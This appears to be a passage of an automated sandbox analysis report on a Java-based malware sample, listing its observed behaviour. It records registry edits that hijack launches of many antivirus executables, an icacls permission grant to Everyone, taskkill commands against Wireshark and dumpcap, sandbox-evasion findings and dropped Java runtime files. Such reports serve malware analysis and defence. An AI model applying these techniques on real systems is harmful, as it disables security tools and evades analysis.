        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GdBgInx64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDScan.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKWCtlx64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKTray.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7CrvSvc.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMain.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nnf.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nbrowser.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nfservice.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\regedit.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PTASKKILL /IM WIRESHARK.EXE /T /F
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SUPERANTISPYWARE.EXE
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TASKKILL /IM WIRESHARK.EXE /T /F
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PTASKKILL /IM DUMPCAP.EXE /T /F
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TASKKILL /IM DUMPCAP.EXE /T /F
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\management.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\net.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
